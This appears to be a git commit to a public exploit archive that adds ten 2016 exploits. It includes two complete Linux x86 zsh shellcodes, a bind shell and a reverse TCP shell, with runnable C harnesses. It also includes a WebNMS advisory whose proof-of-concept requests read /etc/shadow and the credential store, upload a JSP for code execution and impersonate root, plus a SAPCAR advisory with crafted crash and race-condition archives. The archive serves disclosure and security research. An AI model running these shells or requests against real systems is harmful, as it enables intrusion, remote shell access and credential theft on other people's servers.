DB: 2016-08-11
10 new exploits Nagios Network Analyzer 2.2.1 - Multiple CSRF Linux/x86 - zsh TCP Bind Shell Port 9090 (96 bytes) Linux/x86 - zsh Reverse TCP Shellcode port 9090 (80 bytes) Microsoft Office Word 2007_2010_2013_2016 - Out-of-Bounds Read Remote Code Execution (MS16-099) vBulletin 5.2.2 - Preauth Server Side Request Forgery (SSRF) EyeLock Myris 3.3.2 - SDK Service Unquoted Service Path Privilege Escalation EyeLock nano NXT 3.5 - Local File Disclosure EyeLock nano NXT 3.5 - Remote Root Exploit WebNMS Framework Server 5.2 and 5.2 SP1 - Multiple Vulnerabilities SAP SAPCAR - Multiple Vulnerabilities
This commit is contained in:
parent
3b59d25c95
commit
832f9cf8b5
11 changed files with 1609 additions and 0 deletions
10
files.csv
10
files.csv
|
@ -36370,3 +36370,13 @@ id,file,description,date,author,platform,type,port
|
|||
40218,platforms/php/webapps/40218.txt,"phpCollab CMS 2.5 - (emailusers.php) SQL Injection",2016-08-08,Vulnerability-Lab,php,webapps,80
|
||||
40219,platforms/windows/local/40219.txt,"Microsoft Windows 7 (x32/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",windows,local,0
|
||||
40220,platforms/php/webapps/40220.txt,"WordPress Add From Server Plugin < 3.3.2 - (File Upload) CSRF",2016-08-08,"Edwin Molenaar",php,webapps,80
|
||||
40221,platforms/php/webapps/40221.txt,"Nagios Network Analyzer 2.2.1 - Multiple CSRF",2016-08-10,hyp3rlinx,php,webapps,80
|
||||
40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - zsh TCP Bind Shell Port 9090 (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
|
||||
40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - zsh Reverse TCP Shellcode port 9090 (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
|
||||
40224,platforms/windows/dos/40224.txt,"Microsoft Office Word 2007_2010_2013_2016 - Out-of-Bounds Read Remote Code Execution (MS16-099)",2016-08-10,"Sébastien Morin",windows,dos,0
|
||||
40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Preauth Server Side Request Forgery (SSRF)",2016-08-10,"Dawid Golunski",php,webapps,80
|
||||
40226,platforms/windows/local/40226.txt,"EyeLock Myris 3.3.2 - SDK Service Unquoted Service Path Privilege Escalation",2016-08-10,LiquidWorm,windows,local,0
|
||||
40227,platforms/php/webapps/40227.txt,"EyeLock nano NXT 3.5 - Local File Disclosure",2016-08-10,LiquidWorm,php,webapps,80
|
||||
40228,platforms/php/webapps/40228.py,"EyeLock nano NXT 3.5 - Remote Root Exploit",2016-08-10,LiquidWorm,php,webapps,80
|
||||
40229,platforms/jsp/webapps/40229.txt,"WebNMS Framework Server 5.2 and 5.2 SP1 - Multiple Vulnerabilities",2016-08-10,"Pedro Ribeiro",jsp,webapps,0
|
||||
40230,platforms/linux/dos/40230.txt,"SAP SAPCAR - Multiple Vulnerabilities",2016-08-10,"Core Security",linux,dos,0
|
||||
|
|
Can't render this file because it is too large.
|
89
platforms/jsp/webapps/40229.txt
Executable file
89
platforms/jsp/webapps/40229.txt
Executable file
|
@ -0,0 +1,89 @@
|
|||
>> Multiple vulnerabilities in WebNMS Framework Server 5.2 and 5.2 SP1
|
||||
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
|
||||
==========================================================================
|
||||
Disclosure: 04/07/2016 / Last updated: 08/08/2016
|
||||
|
||||
>> Background on the affected product:
|
||||
"WebNMS is an industry-leading framework for building network management applications. With over 25,000 deployments worldwide and in every Tier 1 Carrier, network equipment providers and service providers can customize, extend and rebrand WebNMS as a comprehensive Element Management System (EMS) or Network Management System (NMS).
|
||||
NOC Operators, Architects and Developers can customize the functional modules to fit their domain and network. Functional modules include Fault Correlation, Performance KPIs, Device Configuration, Service Provisioning and Security. WebNMS supports numerous Operating Systems, Application Servers, and databases."
|
||||
|
||||
|
||||
>> Summary:
|
||||
WebNMS contains three critical vulnerabilities that can be exploited by an unauthenticated attacker: one directory traversal that can be used to achieve remote code execution, another directory traversal that can be abused to download any text file in the system and the possibility to impersonate any user in the system. In addition, WebNMS also stores the user passwords in a file with a weak obfuscation algorithm that can be easily reversed.
|
||||
|
||||
A special thanks to the SecuriTeam Secure Disclosure programme (SSD), which performed the disclosure in a responsible manner to the affected vendor. This advisory can be seen in their blog at https://blogs.securiteam.com/index.php/archives/2712
|
||||
|
||||
Metasploit exploits for all vulnerabilities have also been released.
|
||||
|
||||
|
||||
>> Technical details:
|
||||
#1
|
||||
Vulnerability: Directory traversal in file upload functionality (leading to remote code execution)
|
||||
CVE-2016-6600
|
||||
Attack Vector: Remote
|
||||
Constraints: Can be exploited by an unauthenticated attacker. See below for other constraints.
|
||||
Affected versions: unknown, at least 5.2 and 5.2 SP1
|
||||
|
||||
The FileUploadServlet has a directory traversal vulnerability, that allows an unauthenticated attacker to upload a JSP file that executes on the server.
|
||||
To exploit this vulnerability, simply POST as per the proof of concept below. The directory traversal is in the "fileName" parameter.
|
||||
|
||||
POST /servlets/FileUploadServlet?fileName=../jsp/Login.jsp HTTP/1.1
|
||||
<JSP payload here>
|
||||
|
||||
There are two things to keep in mind for the upload to be successful:
|
||||
- Only text files can be uploaded, binary files will be mangled.
|
||||
- In order to achieve code execution without authentication, the files need to be dropped in ../jsp/ but they can only have the following names: either Login.jsp or a WebStartXXX.jsp, where XXX is any string of any length.
|
||||
|
||||
|
||||
#2
|
||||
Vulnerability: Directory traversal in file download functionality
|
||||
CVE-2016-6601
|
||||
Attack Vector: Remote
|
||||
Constraints: Can be exploited by an unauthenticated attacker. Only text files can be downloaded properly, any binary file will get mangled by the servlet and downloaded incorrectly.
|
||||
Affected versions: unknown, at least 5.2 and 5.2 SP1
|
||||
|
||||
The FetchFile servlet has a directory traversal vulnerability that can be abused by an unauthenticated attacker to download arbitrary files from the WebNMS host. The vulnerable parameter is "fileName" and a proof of concept is shown below.
|
||||
|
||||
GET /servlets/FetchFile?fileName=../../../etc/shadow
|
||||
|
||||
|
||||
#3
|
||||
Vulnerability: Weak obfuscation algorithm used to store passwords
|
||||
CVE-2016-6602
|
||||
Attack Vector: Remote
|
||||
Constraints: Can be exploited by an unauthenticated attacker.
|
||||
Affected versions: unknown, at least 5.2 and 5.2 SP1
|
||||
|
||||
The ./conf/securitydbData.xml file (in the WebNMS WEB-INF directory) contains entries with all the usernames and passwords in the server:
|
||||
<DATA ownername="NULL" password="e8c89O1f" username="guest"/>
|
||||
<DATA ownername="NULL" password="d7963B4t" username="root"/>
|
||||
|
||||
The algorithm used to obfuscate is convoluted but easy to reverse engineer. The passwords above are "guest" for the "guest" user and "admin" for the "root" user. A Metasploit module implementing the deobfuscation algorithm has been released.
|
||||
|
||||
This vulnerability can be combined with #2 and allow an unauthenticated attacker to obtain credentials for all user accounts:
|
||||
GET /servlets/FetchFile?fileName=conf/securitydbData.xml
|
||||
|
||||
|
||||
#4
|
||||
Vulnerability: User account impersonation / hijacking
|
||||
CVE-2016-6603
|
||||
Attack Vector: Remote
|
||||
Constraints: Can be exploited by an unauthenticated attacker.
|
||||
Affected versions: unknown, at least 5.2 and 5.2 SP1
|
||||
|
||||
It is possible to impersonate any user in WebNMS by simply setting the "UserName" HTTP header when making a request, which will return a valid authenticated session cookie. This allows an unauthenticated attacker to impersonate the superuser ("root") and perform administrative actions. The proof of concept is shown below:
|
||||
|
||||
GET /servlets/GetChallengeServlet HTTP/1.1
|
||||
UserName: root
|
||||
|
||||
This returns the cookie "SessionId=0033C8CFFE37EB6093849CBA4BF2CAF3;" which is a valid, JSESSIONID cookie authenticated as the "root" user. This can then be used to login to the WebNMS Framework Server by simply setting the cookie and browsing to any page.
|
||||
|
||||
|
||||
>> Fix:
|
||||
Since the vendor did not respond to any contacts attempted by Beyond Security and its SSD programme, it is not known whether a fixed version of WebNMS Framework Server has been released. It is highly recommended not to expose the server to any untrusted networks (such as the Internet).
|
||||
|
||||
|
||||
================
|
||||
Agile Information Security Limited
|
||||
http://www.agileinfosec.co.uk/
|
||||
>> Enabling secure digital business >>
|
190
platforms/lin_x86/shellcode/40222.c
Executable file
190
platforms/lin_x86/shellcode/40222.c
Executable file
|
@ -0,0 +1,190 @@
|
|||
/*
|
||||
|
||||
;
|
||||
; Linux x86
|
||||
; Author: thryb
|
||||
; Date: 13-07-16
|
||||
; Purpose: Bind /bin/zsh to TCP port 9090
|
||||
; Size: 96 bytes
|
||||
; ID: SLAE-770
|
||||
; Git: https://www.github.com/thryb/SLAE-770
|
||||
;
|
||||
|
||||
global _start
|
||||
|
||||
section .text
|
||||
_start:
|
||||
|
||||
xor eax, eax ; cleaning registers for sanity
|
||||
xor ebx, ebx
|
||||
xor edx, edx
|
||||
xor edi, edi
|
||||
|
||||
; 1 - create socket
|
||||
; socket(AF_INET, SOCK_STREAM, 0);
|
||||
; #define SYS_SOCKET 1 // sys_socket(2)
|
||||
|
||||
push eax ; null
|
||||
mov al, 0x66 ; sys_socketcall = 102
|
||||
mov bl, 0x1 ; socketcall() socket = 1
|
||||
push byte 0x1 ; stack = 0, 1
|
||||
push byte 0x2 ; stack = 0, 1, 2 (0, SOCK_STREAM, AF_INET)
|
||||
mov ecx, esp ; mov stack ptr to ecx
|
||||
int 0x80 ; init
|
||||
|
||||
; 2 - Bind port
|
||||
; bind(fd, (struct sockaddr *) &s_addr, 16);
|
||||
; #define SYS_BIND 2 // sys_bind(2)
|
||||
|
||||
xchg edi, eax ; transfer fd to edi
|
||||
mov al, 0x66 ; sys_socketcall = 102
|
||||
pop ebx ; sys_bind = 2
|
||||
pop esi ; = 1
|
||||
push edx ; stack = [0]
|
||||
push word 0x8223 ; stack = [0, port_num]
|
||||
push word bx ; stack = [0, port_num, 2]
|
||||
push byte 16 ; stack = [0, port_num, 2], 16
|
||||
push ecx ; stack = [0, port_num, 2], 16, pointer
|
||||
push edi ; stack = [0, port_num, 2], 16, *ptr, fd
|
||||
mov ecx, esp ; move stack ptr to ecx
|
||||
int 0x80 ; init
|
||||
|
||||
; 3 - Listen
|
||||
; listen(fd, 1);
|
||||
; #define SYS_LISTEN 4 // sys_listen(2)
|
||||
|
||||
pop edx ; save fd
|
||||
mov al, 0x66 ; sys_socketcall = 102
|
||||
add bl, 0x2 ; bl + 2 (bl 2 from bind)
|
||||
int 0x80 ; init
|
||||
|
||||
; 4 - Accept
|
||||
; accept(fd, NULL, NULL);
|
||||
; #define SYS_ACCEPT 5 // sys_accept(2)
|
||||
|
||||
push eax ; 0 - NULL
|
||||
push eax ; 0 - NULL
|
||||
mov al, 0x66 ; sys_socketcall = 102
|
||||
inc ebx ; make 5 for listen (4 from listen)
|
||||
push edx ; push fd on stack
|
||||
mov ecx, esp ; move stack ptr to ecx
|
||||
int 0x80 ; init
|
||||
|
||||
; 5 - dup
|
||||
; sys_dup2 = 63 = 0x3f
|
||||
|
||||
xchg eax, ebx ; ebx = fd / eax = 5
|
||||
xor ecx, ecx ; NULL ecx
|
||||
add cl, 0x2 ; add 2 to counter
|
||||
|
||||
dup2: ; STDIN, STDOUT, STDERR
|
||||
mov al, 0x3f ; sys_dup2
|
||||
int 0x80 ; init
|
||||
dec cl ; decrement counter
|
||||
jns dup2 ; Jump on No Sign (Positive)
|
||||
|
||||
; 6 - execve /bin/zsh
|
||||
; normal execve shell exec
|
||||
|
||||
push eax
|
||||
push 0x68737a2f ; hsz/
|
||||
push 0x6e69622f ; nib/
|
||||
|
||||
mov ebx, esp
|
||||
|
||||
push eax
|
||||
mov edx, esp
|
||||
|
||||
push ebx
|
||||
mov ecx, esp
|
||||
|
||||
mov al, 0xb ; sys_execve (11)
|
||||
int 0x80 ; init
|
||||
|
||||
============================================================================================================
|
||||
|
||||
No NULL
|
||||
|
||||
./bind-sh-tcp-9090: file format elf32-i386
|
||||
|
||||
|
||||
Disassembly of section .text:
|
||||
|
||||
08048060 <_start>:
|
||||
8048060: 31 c0 xor %eax,%eax
|
||||
8048062: 31 db xor %ebx,%ebx
|
||||
8048064: 31 d2 xor %edx,%edx
|
||||
8048066: 31 ff xor %edi,%edi
|
||||
8048068: 50 push %eax
|
||||
8048069: b0 66 mov $0x66,%al
|
||||
804806b: b3 01 mov $0x1,%bl
|
||||
804806d: 6a 01 push $0x1
|
||||
804806f: 6a 02 push $0x2
|
||||
8048071: 89 e1 mov %esp,%ecx
|
||||
8048073: cd 80 int $0x80
|
||||
8048075: 97 xchg %eax,%edi
|
||||
8048076: b0 66 mov $0x66,%al
|
||||
8048078: 5b pop %ebx
|
||||
8048079: 5e pop %esi
|
||||
804807a: 52 push %edx
|
||||
804807b: 66 68 23 82 pushw $0x8223
|
||||
804807f: 66 53 push %bx
|
||||
8048081: 6a 10 push $0x10
|
||||
8048083: 51 push %ecx
|
||||
8048084: 57 push %edi
|
||||
8048085: 89 e1 mov %esp,%ecx
|
||||
8048087: cd 80 int $0x80
|
||||
8048089: 5a pop %edx
|
||||
804808a: b0 66 mov $0x66,%al
|
||||
804808c: 80 c3 02 add $0x2,%bl
|
||||
804808f: cd 80 int $0x80
|
||||
8048091: 50 push %eax
|
||||
8048092: 50 push %eax
|
||||
8048093: b0 66 mov $0x66,%al
|
||||
8048095: 43 inc %ebx
|
||||
8048096: 52 push %edx
|
||||
8048097: 89 e1 mov %esp,%ecx
|
||||
8048099: cd 80 int $0x80
|
||||
804809b: 93 xchg %eax,%ebx
|
||||
804809c: 31 c9 xor %ecx,%ecx
|
||||
804809e: 80 c1 02 add $0x2,%cl
|
||||
|
||||
080480a1 <dup2>:
|
||||
80480a1: b0 3f mov $0x3f,%al
|
||||
80480a3: cd 80 int $0x80
|
||||
80480a5: fe c9 dec %cl
|
||||
80480a7: 79 f8 jns 80480a1 <dup2>
|
||||
80480a9: 50 push %eax
|
||||
80480aa: 68 2f 7a 73 68 push $0x68737a2f
|
||||
80480af: 68 2f 62 69 6e push $0x6e69622f
|
||||
80480b4: 89 e3 mov %esp,%ebx
|
||||
80480b6: 50 push %eax
|
||||
80480b7: 89 e2 mov %esp,%edx
|
||||
80480b9: 53 push %ebx
|
||||
80480ba: 89 e1 mov %esp,%ecx
|
||||
80480bc: b0 0b mov $0xb,%al
|
||||
80480be: cd 80 int $0x80
|
||||
|
||||
|
||||
*/
|
||||
|
||||
#include<stdio.h>
|
||||
#include<string.h>
|
||||
|
||||
unsigned char code[] = \
|
||||
"\x31\xc0\x31\xdb\x31\xd2\x31\xff\x50\xb0\x66\xb3\x01\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x97\xb0\x66\x5b\x5e\x52\x66\x68"
|
||||
// ==== Port ====
|
||||
"\x23\x82"
|
||||
// ==============
|
||||
"\x66\x53\x6a\x10\x51\x57\x89\xe1\xcd\x80\x5a\xb0\x66\x80\xc3\x02\xcd\x80\x50\x50\xb0\x66\x43\x52\x89\xe1\xcd\x80\x93\x31\xc9\x80\xc1\x02\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\x50\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
|
||||
|
||||
main()
|
||||
{
|
||||
|
||||
printf("Shellcode Length: %d\n", strlen(code));
|
||||
|
||||
int (*ret)() = (int(*)())code;
|
||||
|
||||
ret();
|
||||
|
||||
}
|
158
platforms/lin_x86/shellcode/40223.c
Executable file
158
platforms/lin_x86/shellcode/40223.c
Executable file
|
@ -0,0 +1,158 @@
|
|||
/*
|
||||
|
||||
;
|
||||
; Linux x86
|
||||
; Author: thryb
|
||||
; Date: 21-07-16
|
||||
; Purpose: Reverse /bin/zsh to TCP port 9090
|
||||
; Size: 80 bytes
|
||||
; ID: SLAE-770
|
||||
; Git: https://www.github.com/thryb/SLAE-770
|
||||
;
|
||||
|
||||
|
||||
global _start
|
||||
|
||||
section .text
|
||||
|
||||
_start:
|
||||
|
||||
xor eax, eax ; cleaning registers
|
||||
xor ebx, ebx
|
||||
|
||||
; 1 - create socket
|
||||
; socket(AF_INET, SOCK_STREAM, 0);
|
||||
; #define SYS_SOCKET 1 // sys_socket(2)
|
||||
push eax ; null terminate
|
||||
push byte 0x1 ; stack = 0, 1
|
||||
push byte 0x2 ; stack = 0, 1, 2 (0, SOCK_STREAM, AF_INET)
|
||||
mov al, 0x66 ; sys_socketcall = 102
|
||||
mov bl, 0x1 ; socketcall() socket = 1
|
||||
mov ecx, esp ; mv stack ptr into ecx
|
||||
int 0x80 ; init
|
||||
|
||||
xchg esi, eax ; saving sockfd
|
||||
|
||||
; 2 - Connect
|
||||
; connect(sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr));
|
||||
|
||||
mov al, 0x66 ; sys_socketcall = 102
|
||||
add ebx, 0x2 ; sys_connect = 3
|
||||
push 0xefffff7f ; 127.255.255.254 (ip2shell.py)
|
||||
push word 0x8223 ; 9090 (port2shell.py)
|
||||
push word 0x2 ; 2 AF_INET
|
||||
mov ecx, esp ; mv stack ptr to ecx
|
||||
push 0x10 ; addr leght 16
|
||||
push ecx ; ptr address
|
||||
push esi ; fd
|
||||
mov ecx, esp ; mv final stack ptr to ecx
|
||||
int 0x80 ; init
|
||||
|
||||
xchg eax, esi ; save sockfd
|
||||
|
||||
; 3 - dup
|
||||
; sys_dup2 = 63 = 0x3f
|
||||
|
||||
xor ecx, ecx ; NULL ecx
|
||||
add cl, 0x2 ; add 2 to counter
|
||||
|
||||
dup2: ; STDIN, STDOUT, STDERR
|
||||
mov al, 0x3f ; sys_dup2
|
||||
int 0x80 ; init
|
||||
dec cl ; decrement counter
|
||||
jns dup2 ; Jump on No Sign (Positive)
|
||||
|
||||
; 4 - execve /bin/zsh
|
||||
; normal execve shell exec
|
||||
|
||||
push eax ; null
|
||||
push 0x68737a2f ; hsz/
|
||||
push 0x6e69622f ; nib/
|
||||
mov ebx, esp ; mv stack ptr to ebx
|
||||
push eax ; null
|
||||
push ebx ; push ptr addr
|
||||
mov ecx, esp ; mv new stack ptr to ecx
|
||||
mov al, 0xb ; sys_execve (11)
|
||||
int 0x80 ; init
|
||||
|
||||
|
||||
============================================================================================================
|
||||
|
||||
No NULL
|
||||
|
||||
./reverse-zsh-tcp-9090.bin: file format elf32-i386
|
||||
|
||||
|
||||
Disassembly of section .text:
|
||||
|
||||
08048060 <_start>:
|
||||
8048060: 31 c0 xor %eax,%eax
|
||||
8048062: 31 db xor %ebx,%ebx
|
||||
8048064: 50 push %eax
|
||||
8048065: 6a 01 push $0x1
|
||||
8048067: 6a 02 push $0x2
|
||||
8048069: b0 66 mov $0x66,%al
|
||||
804806b: b3 01 mov $0x1,%bl
|
||||
804806d: 89 e1 mov %esp,%ecx
|
||||
804806f: cd 80 int $0x80
|
||||
8048071: 96 xchg %eax,%esi
|
||||
8048072: b0 66 mov $0x66,%al
|
||||
8048074: 83 c3 02 add $0x2,%ebx
|
||||
8048077: 68 7f ff ff ef push $0xefffff7f
|
||||
804807c: 66 68 23 82 pushw $0x8223
|
||||
8048080: 66 6a 02 pushw $0x2
|
||||
8048083: 89 e1 mov %esp,%ecx
|
||||
8048085: 6a 10 push $0x10
|
||||
8048087: 51 push %ecx
|
||||
8048088: 56 push %esi
|
||||
8048089: 89 e1 mov %esp,%ecx
|
||||
804808b: cd 80 int $0x80
|
||||
804808d: 96 xchg %eax,%esi
|
||||
804808e: 31 c9 xor %ecx,%ecx
|
||||
8048090: 80 c1 02 add $0x2,%cl
|
||||
|
||||
08048093 <dup2>:
|
||||
8048093: b0 3f mov $0x3f,%al
|
||||
8048095: cd 80 int $0x80
|
||||
8048097: fe c9 dec %cl
|
||||
8048099: 79 f8 jns 8048093 <dup2>
|
||||
804809b: 50 push %eax
|
||||
804809c: 68 2f 7a 73 68 push $0x68737a2f
|
||||
80480a1: 68 2f 62 69 6e push $0x6e69622f
|
||||
80480a6: 89 e3 mov %esp,%ebx
|
||||
80480a8: 50 push %eax
|
||||
80480a9: 53 push %ebx
|
||||
80480aa: 89 e1 mov %esp,%ecx
|
||||
80480ac: b0 0b mov $0xb,%al
|
||||
80480ae: cd 80 int $0x80
|
||||
|
||||
|
||||
*/
|
||||
|
||||
#include<stdio.h>
|
||||
#include<string.h>
|
||||
|
||||
unsigned char code[] = \
|
||||
"\x31\xc0\x31\xdb\x50\x6a\x01\x6a\x02\xb0\x66\xb3\x01\x89\xe1\xcd\x80\x96\xb0\x66\x83\xc3\x02\x68"
|
||||
|
||||
// Replace IP here (use ip2shell.py to generate IP).
|
||||
"\x7f\xff\xff\xef"
|
||||
// *****************
|
||||
|
||||
"\x66\x68"
|
||||
|
||||
// Replace port here (use port2shell.py to generate IP).
|
||||
"\x23\x82"
|
||||
// *****************
|
||||
|
||||
"\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x96\x31\xc9\x80\xc1\x02\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\x50\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
|
||||
main()
|
||||
{
|
||||
|
||||
printf("Shellcode Length: %d\n", strlen(code));
|
||||
|
||||
int (*ret)() = (int(*)())code;
|
||||
|
||||
ret();
|
||||
|
||||
}
|
142
platforms/linux/dos/40230.txt
Executable file
142
platforms/linux/dos/40230.txt
Executable file
|
@ -0,0 +1,142 @@
|
|||
1. Advisory Information
|
||||
|
||||
Title: SAP CAR Multiple Vulnerabilities
|
||||
Advisory ID: CORE-2016-0006
|
||||
Advisory URL: http://www.coresecurity.com/advisories/sap-car-multiple-vulnerabilities
|
||||
Date published: 2016-08-09
|
||||
Date of last update: 2016-08-09
|
||||
Vendors contacted: SAP
|
||||
Release mode: Coordinated release
|
||||
|
||||
2. Vulnerability Information
|
||||
|
||||
Class: Unchecked Return Value [CWE-252], TOCTOU Race Condition [CWE-367]
|
||||
Impact: Denial of service, Security bypass
|
||||
Remotely Exploitable: No
|
||||
Locally Exploitable: Yes
|
||||
CVE Name: CVE-2016-5845, CVE-2016-5847
|
||||
|
||||
3. Vulnerability Description
|
||||
|
||||
SAP [1] distributes software and packages using an archive program called SAPCAR. This program uses a custom archive file format. Vulnerabilities were found in the extraction of specially crafted archive files, that could lead to local denial of service conditions or privilege escalation.
|
||||
|
||||
4. Vulnerable Packages
|
||||
|
||||
SAPCAR archive tool
|
||||
Other products and versions might be affected, but they were not tested.
|
||||
|
||||
5. Vendor Information, Solutions and Workarounds
|
||||
|
||||
SAP published the following Security Notes:
|
||||
|
||||
2312905
|
||||
2327384
|
||||
|
||||
6. Credits
|
||||
|
||||
This vulnerability was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Advisories Team.
|
||||
|
||||
7. Technical Description / Proof of Concept Code
|
||||
|
||||
SAP distributes software and packages using an archive program called SAPCAR. This program uses a custom archive file format. Vulnerabilities were found in the extraction of specially crafted archive files, that could lead to denial of service conditions or escalation of privileges.
|
||||
|
||||
The code that handles the extraction of archive files is prone to privilege escalation and denial of service vulnerabilities.
|
||||
|
||||
7.1. Denial of service via invalid file names
|
||||
|
||||
[CVE-2016-5845] Denial of service vulnerability due the SAPCAR program not checking the return value of file operations when extracting files. This might result in the program crashing when trying to extract files from an specially crafted archive file that contains invalid file names for the target platform. Of special interest are applications or solutions that makes use of SAPCAR in an automated way.
|
||||
|
||||
The following is a proof of concept to demonstrate the vulnerability:
|
||||
|
||||
|
||||
$ xxd SAPCAR_crash.SAR
|
||||
0000000: 4341 5220 322e 3031 4452 0081 0000 0f00 CAR 2.01DR......
|
||||
0000010: 0000 0000 0000 0000 0000 d4f8 e555 0000 .............U..
|
||||
0000020: 0000 0000 0000 0000 1000 696e 7075 742d ..........input-
|
||||
0000030: 6469 722f 696e 7090 7400 4544 1a00 0000 dir/inp.t.ED....
|
||||
0000040: 0f00 0000 121f 9d02 7bc1 23b9 a90a 25a9 ........{.#...%.
|
||||
0000050: 1525 0a69 9939 a95c 0000 857f b95a .%.i.9.\.....Z
|
||||
|
||||
$ ./SAPCAR -dvf SAPCAR_crash.SAR
|
||||
SAPCAR: processing archive SAPCAR_crash.SAR (version 2.01)
|
||||
d input-dir/inp#t
|
||||
SAPCAR: checksum error in input-dir/inp#t (error 12). No such file or director
|
||||
|
||||
$ ./SAPCAR -xvf SAPCAR_crash.SAR
|
||||
SAPCAR: processing archive SAPCAR_crash.SAR (version 2.01)
|
||||
x input-dir/inp#t
|
||||
Segmentation fault
|
||||
|
||||
7.2. Race condition on permission change
|
||||
|
||||
[CVE-2016-5847] Race condition vulnerability due to the way the SAPCAR program change the permissions of extracted files. If a malicious local user has access to a directory where a user is extracting files using SAPCAR, the attacker might use this vulnerability to change the permissions of arbitrary files belonging to the user.
|
||||
|
||||
The SAPCAR program writes the file being extracted and after closing it, the program changes the permissions to the ones set on the archive file. There's a time gap between the creating of the file and the change of the permissions. During this time frame, a malicious local user can replace the extracted file with a hard link to a file belonging to another user, resulting in the SAPCAR program changing the permissions on the hard-linked file to be the same as that of the compressed file.
|
||||
|
||||
The following is a proof of concept to demonstrate the vulnerability:
|
||||
|
||||
|
||||
$ xxd SAPCAR_race_condition.SAR
|
||||
0000000: 4341 5220 322e 3031 5247 b481 0000 2b00 CAR 2.01RG....+.
|
||||
0000010: 0000 0000 0000 0000 0000 d023 5e56 0000 ...........#^V..
|
||||
0000020: 0000 0000 0000 0000 1000 7465 7374 5f73 ..........test_s
|
||||
0000030: 7472 696e 672e 7478 7400 4544 3500 0000 tring.txt.ED5...
|
||||
0000040: 2b00 0000 121f 9d02 7b21 19a9 0a85 a599 +.......{!......
|
||||
0000050: c9d9 0a49 45f9 e579 0a69 f915 0a59 a5b9 ...IE..y.i...Y..
|
||||
0000060: 05c5 0af9 65a9 450a 2540 e99c c4aa 4a85 ....e.E.%@....J.
|
||||
0000070: 94fc 7400 0008 08c6 b9 ..t......
|
||||
|
||||
$ ./SAPCAR -tvf SAPCAR_race_condition.SAR
|
||||
SAPCAR: processing archive SAPCAR_race_condition.SAR (version 2.01)
|
||||
-rw-rw-r-- 43 01 Dec 2015 19:48 test_string.txt
|
||||
|
||||
$ strace ./SAPCAR -xvf SAPCAR_race_condition.SAR
|
||||
execve("./SAPCAR", ["./SAPCAR", "-xvf", "SAPCAR_race_condition.SAR"], [/* 76 vars */]) = 0
|
||||
[..]
|
||||
open("test_string.txt", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 4
|
||||
mmap(NULL, 323584, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f98c4704000
|
||||
fstat(4, {st_mode=S_IFREG|0664, st_size=0, ...}) = 0
|
||||
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f98c475c000
|
||||
write(4, "The quick brown fox jumps over t"..., 43) = 43
|
||||
close(4) = 0
|
||||
munmap(0x7f98c475c000, 4096) = 0
|
||||
utime("test_string.txt", [2015/12/01-19:48:48, 2015/12/01-19:48:48]) = 0
|
||||
chmod("test_string.txt", 0664) = 0
|
||||
[..]
|
||||
|
||||
8. Report Timeline
|
||||
|
||||
2016-04-21: Core Security sent an initial notification to SAP.
|
||||
2016-04-22: SAP confirmed the reception of the email and requested the draft version of the advisory.
|
||||
2016-04-22: Core Security sent SAP a draft version of the advisory and informed them we would adjust our publication schedule according with the release of a solution to the issues.
|
||||
2016-04-25: SAP confirmed the reported vulnerabilities and assigned the following security incident tickets IDs: 1670264798, 1670264799 and 1670264800.
|
||||
2016-05-10: Core Security asked SAP if they had a tentative date for publishing the security fixes.
|
||||
2016-05-20: SAP informed Core Security they have a tentative release date on July 12th, 2016 (July Patch day).
|
||||
2016-05-23: Core Security thanked SAP for the tentative date and informed them we would publish our security advisory accordingly upon their confirmation.
|
||||
2016-06-27: Core Security requested SAP the tentative security notes numbers and links in order to add them to our security advisory.
|
||||
2016-07-05: SAP informed Core Security they due to some issues found during their testing phase of the patches they were not in a position to ship the patches as part of their July patch day. They said they would be able to ship the patches with August patch day.
|
||||
2016-07-06: Core Security requested SAP the specific day in August they planed to release the patches.
|
||||
2016-07-20: Core Security requested again SAP the specific day in August they planed to release the patches.
|
||||
2016-07-21: SAP informed Core Security they would publish their security notes on the 9th of August.
|
||||
2016-08-10: Advisory CORE-2016-0006 published.
|
||||
9. References
|
||||
|
||||
[1] http://go.sap.com/.
|
||||
|
||||
10. About CoreLabs
|
||||
|
||||
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
|
||||
|
||||
11. About Core Security
|
||||
|
||||
Courion and Core Security have rebranded the combined company, changing its name to Core Security, to reflect the company’s strong commitment to providing enterprises with market-leading, threat-aware, identity, access and vulnerability management solutions that enable actionable intelligence and context needed to manage security risks across the enterprise. Core Security’s analytics-driven approach to security enables customers to manage access and identify vulnerabilities, in order to minimize risks and maintain continuous compliance. Solutions include Multi-Factor Authentication, Provisioning, Identity Governance and Administration (IGA), Identity and Access Intelligence (IAI), and Vulnerability Management (VM). The combination of these solutions provides context and shared intelligence through analytics, giving customers a more comprehensive view of their security posture so they can make more informed, prioritized, and better security remediation decisions.
|
||||
|
||||
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com.
|
||||
|
||||
12. Disclaimer
|
